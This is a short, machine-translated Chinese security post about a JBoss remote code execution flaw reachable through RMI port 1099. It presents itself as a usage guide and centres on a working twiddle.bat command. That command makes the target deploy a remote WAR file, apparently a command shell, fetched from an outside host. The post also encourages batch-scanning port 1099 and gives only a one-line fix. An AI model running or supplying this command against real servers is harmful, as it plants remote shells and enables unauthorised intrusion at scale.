JBOSS 1 0 9 9 port remote method invocation vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201442130
Type myhack58
Reporter 空虚浪子心
Modified 2014-02-03T00:00:00


Bird brother a few days ago sent me an article that is a java vulnerability, about 1 0 9 9 port may be remote method invocation thing.

I suddenly think of it, had to XCON2012 of time, due to“forgotten”so there is no mention of a problem is a JBOSS remote code execution vulnerability. The domestic seemingly not see the translation and use of the guide. The time it took so long, actually really forgotten. Its principles and EJBinvoker that almost, saying a few days ago released a EJBinvoker to, in fact, is the old vulnerabilities, all had been together with the release, EXP combat place, just the url is different, but the domestic didn't see the“usage guidelines”of the vulnerability. So much so that many people will not use. Use the guide as follows, what does not Google.

Vulnerability details:

twiddle. bat-s jnp://www. target. net:1 0 9 9 invoke jboss. system:service=MainDeployer deploy http://www.inbreak.net/cmd.war

In fact this was in an article of a foreigner in the article, and several other JBOSS issue all together. Mean remote deploy a war up, specific principles, and EJBInvokerServlet / JMXInvokerServlet substantially uniform, the scanning characteristics are basically the same. So, you can batch scan 1 0 9 9 port. In addition, JBOSS 4 4 4 4-port, looks also not a good bird, no time to analyze, and wait for the answer. I think domestic security circle The most sad thing in most cases“the use of the tool==of the new vulnerability”, so the“exp==vulnerability details”.

Repair recommendations: invoker deleted, then the 1 0 9 9 close.